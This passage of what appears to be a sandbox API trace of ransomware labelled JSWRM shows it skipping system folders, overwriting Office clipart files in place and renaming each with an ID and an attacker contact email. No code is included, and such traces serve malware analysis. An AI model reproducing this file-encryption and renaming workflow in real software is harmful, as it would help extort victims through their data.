office\\root\\clipart\\pub60cor\\j0107528.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.707] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe78281d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6890, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107544.WMF", cAlternateFileName="")) returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2=".") returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="..") returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="...") returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="windows") returned -1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="recovery") returned -1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="perflogs") returned -1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="documents and settings") returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="system volume information") returned -1 [0082.707] lstrcmpiW (lpString1="J0107544.WMF", lpString2="msocache") returned -1 [0082.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0082.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107544.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107544.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107544.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0082.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0082.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107544.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107544.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107544.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0082.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.708] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26768) returned 1 [0082.708] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6890) returned 0x24d210 [0082.709] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6890, lpOverlapped=0x0) returned 1 [0082.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.712] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6890, lpOverlapped=0x0) returned 1 [0082.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.712] CloseHandle (hObject=0x314) returned 1 [0082.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0082.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0082.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.713] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe75c571, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107658.WMF", cAlternateFileName="")) returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2=".") returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="..") returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="...") returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="windows") returned -1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="recovery") returned -1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="perflogs") returned -1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="documents and settings") returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="system volume information") returned -1 [0082.714] lstrcmpiW (lpString1="J0107658.WMF", lpString2="msocache") returned -1 [0082.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107658.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107658.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107658.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107658.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107658.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107658.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0082.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.715] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7072) returned 1 [0082.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ba0) returned 0x205850 [0082.715] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ba0, lpOverlapped=0x0) returned 1 [0082.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.717] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ba0, lpOverlapped=0x0) returned 1 [0082.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.717] CloseHandle (hObject=0x314) returned 1 [0082.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0082.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0082.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0082.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.718] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.718] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe75c571, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe75c571, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe78281d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107708.WMF", cAlternateFileName="")) returned 1 [0082.718] lstrcmpiW (lpString1="J0107708.WMF", lpString2=".") returned 1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="..") returned 1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="...") returned 1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="windows") returned -1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="recovery") returned -1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="perflogs") returned -1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="documents and settings") returned 1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="system volume information") returned -1 [0082.719] lstrcmpiW (lpString1="J0107708.WMF", lpString2="msocache") returned -1 [0082.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107708.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107708.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107708.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0082.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107708.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107708.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107708.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0082.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.761] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4808) returned 1 [0082.761] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12c0) returned 0x205850 [0082.761] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12c0, lpOverlapped=0x0) returned 1 [0082.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.763] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12c0, lpOverlapped=0x0) returned 1 [0082.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.763] CloseHandle (hObject=0x314) returned 1 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0082.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0082.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0082.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.763] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0082.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0082.764] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe75c571, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107712.WMF", cAlternateFileName="")) returned 1 [0082.764] lstrcmpiW (lpString1="J0107712.WMF", lpString2=".") returned 1 [0082.764] lstrcmpiW (lpString1="J0107712.WMF", lpString2="..") returned 1 [0082.764] lstrcmpiW (lpString1="J0107712.WMF", lpString2="...") returned 1 [0082.764] lstrcmpiW (lpString1="J0107712.WMF", lpString2="windows") returned -1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="recovery") returned -1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="perflogs") returned -1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="documents and settings") returned 1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="system volume information") returned -1 [0082.765] lstrcmpiW (lpString1="J0107712.WMF", lpString2="msocache") returned -1 [0082.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107712.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107712.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, 